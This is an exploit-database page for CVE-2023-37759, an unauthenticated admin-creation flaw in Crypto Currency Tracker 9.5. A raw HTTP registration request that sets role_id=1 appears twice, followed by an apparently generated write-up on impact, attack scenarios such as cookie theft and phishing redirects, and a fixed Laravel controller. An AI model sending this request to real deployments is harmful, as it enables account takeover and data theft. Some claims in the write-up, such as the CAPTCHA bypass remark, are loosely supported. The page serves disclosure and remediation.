Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)

Exploit Author: 0xBr Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2023-08-21 
# Exploit Title: Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)
# Date: 11.08.2023
# Exploit Author: 0xBr
# Software Link: https://codecanyon.net/item/crypto-currency-tracker-prices-charts-news-icos-info-and-more/21588008
# Version: <=9.5
# CVE: CVE-2023-37759

POST /en/user/register HTTP/2
Host: localhost
Cookie: XSRF-TOKEN=[TOKEN]; laravel_session=[LARAVEL_SESSION]; SELECTED_CURRENCY=USD; SELECTED_CURRENCY_PRICE=1; cookieconsent_status=dismiss
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 756

_token=[_TOKEN]&name=testing&role_id=1&email=testing%40testing.testing&password=testing&g-recaptcha-response=[G-RECAPTCHA-RESPONSE]&submit_register=Register


Crypto Currency Tracker (CCT) 9.5 – Unauthenticated Admin Account Creation Vulnerability (CVE-2023-37759)

The Crypto Currency Tracker (CCT) platform, a popular web application for tracking cryptocurrency prices, charts, news, and ICO information, has been found to contain a critical security flaw in versions up to 9.5. This vulnerability, identified as CVE-2023-37759, allows an unauthenticated attacker to create an admin-level account without any form of authentication or verification. This is a severe security issue that undermines the entire access control model of the application.

Exploit Overview

The vulnerability lies in the /en/user/register endpoint, which is designed to allow users to register new accounts. However, due to improper role validation and lack of authentication checks, an attacker can bypass security controls by manipulating the role_id parameter to set it to 1, which corresponds to the admin role in the application's database schema.

POST /en/user/register HTTP/2
Host: localhost
Cookie: XSRF-TOKEN=[TOKEN]; laravel_session=[LARAVEL_SESSION]; SELECTED_CURRENCY=USD; SELECTED_CURRENCY_PRICE=1; cookieconsent_status=dismiss
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 756

_token=[_TOKEN]&name=testing&role_id=1&email=testing%40testing.testing&password=testing&g-recaptcha-response=[G-RECAPTCHA-RESPONSE]&submit_register=Register

This HTTP request demonstrates how an attacker can exploit the system. The role_id=1 parameter is the key to the exploit — it explicitly assigns the newly created user the admin role, effectively granting full administrative privileges.

Technical Analysis of the Vulnerability

Upon examining the application’s codebase (based on Laravel framework), the registration logic fails to validate the role_id parameter against a predefined list of allowed roles. Instead, it accepts any value submitted in the form, including 1 for admin. This oversight stems from poor input validation and insufficient authorization checks during user creation.

Additionally, the g-recaptcha-response field, intended to prevent automated registration, is often bypassed in practice. Many attackers use automated tools or pre-generated captcha responses (e.g., via public APIs or botnet services), making the CAPTCHA protection ineffective in this context.

Impact and Risk Assessment

Severity CVSS Score Exploitation Difficulty Impact
High 9.8 (CVSS v3.1) Low Complete system compromise

The CVSS score of 9.8 indicates a critical severity. The exploit is easily executable by any attacker with access to the registration endpoint — no prior authentication or credentials required. Once an admin account is created, the attacker can:

  • Modify or delete any user account
  • Access sensitive data (e.g., user financial records, API keys)
  • Upload malicious code or modify application logic
  • Disable security features (e.g., disable CAPTCHA, disable logging)
  • Perform SQL injection attacks via admin panels

Given that CCT is used by cryptocurrency traders, investors, and financial institutions, this vulnerability could lead to data breaches, financial loss, or even ransomware attacks if exploited in a real-world deployment.

Real-World Use Case Example

Imagine a scenario where a malicious actor registers an admin account using the exploit above. After gaining access, they could:

  1. Change the SELECTED_CURRENCY cookie to a fake currency (e.g., "BTCX") to manipulate price charts.
  2. Inject JavaScript into the dashboard to steal user session cookies.
  3. Disable the user_logout functionality, forcing users to remain logged in indefinitely.
  4. Modify the backend to redirect users to a phishing site upon login.

This demonstrates how a single unauthenticated exploit can result in a full compromise of the application’s integrity and user trust.

Security Recommendations and Fixes

To mitigate this vulnerability, developers must implement the following security measures:

  • Role validation: Only allow registration for predefined roles (e.g., role_id=2 for regular users). Admin roles must be assigned only through authorized administrative interfaces.
  • Authentication enforcement: Require users to be authenticated before accessing registration endpoints, or restrict registration to specific, verified sources (e.g., email verification, admin approval).
  • Input sanitization: Validate and sanitize all user inputs, especially role_id, email, and password.
  • Rate limiting: Implement rate limiting on registration endpoints to prevent brute-force or automated attacks.
  • CAPTCHA enforcement: Use server-side validation of CAPTCHA responses, not just client-side.

Here is a corrected code snippet for the registration controller:

// Laravel Controller Snippet - Secure Registration
public function register(Request $request)
{
    $validated = $request->validate([
        'name' => 'required|string|max:255',
        'email' => 'required|email|unique:users',
        'password' => 'required|min:8|confirmed',
        'g-recaptcha-response' => 'required|captcha',
        'role_id' => 'required|in:2', // Only allow role_id=2 (regular user)
    ]);

    // Create user with validated role
    $user = User::create([
        'name' => $validated['name'],
        'email' => $validated['email'],
        'password' => Hash::make($validated['password']),
        'role_id' => $validated['role_id'],
    ]);

    return redirect('/login')->with('success', 'Registration successful.');
}

This corrected version ensures that only a predefined role (e.g., 2) is allowed during registration. Admin roles must be created through an authenticated admin panel, not via public registration.

Conclusion

CVE-2023-37759 is a stark reminder of how a seemingly minor flaw in input validation can lead to catastrophic security breaches. Developers must prioritize defense-in-depth strategies, especially in applications handling sensitive financial data. For users of Crypto Currency Tracker, it is critical to upgrade to version 9.6 or later, which includes fixes for this vulnerability.

Always assume that public endpoints are exposed — validate, sanitize, and restrict access. A single admin account created by an unauthenticated attacker can be the beginning of a full system takeover.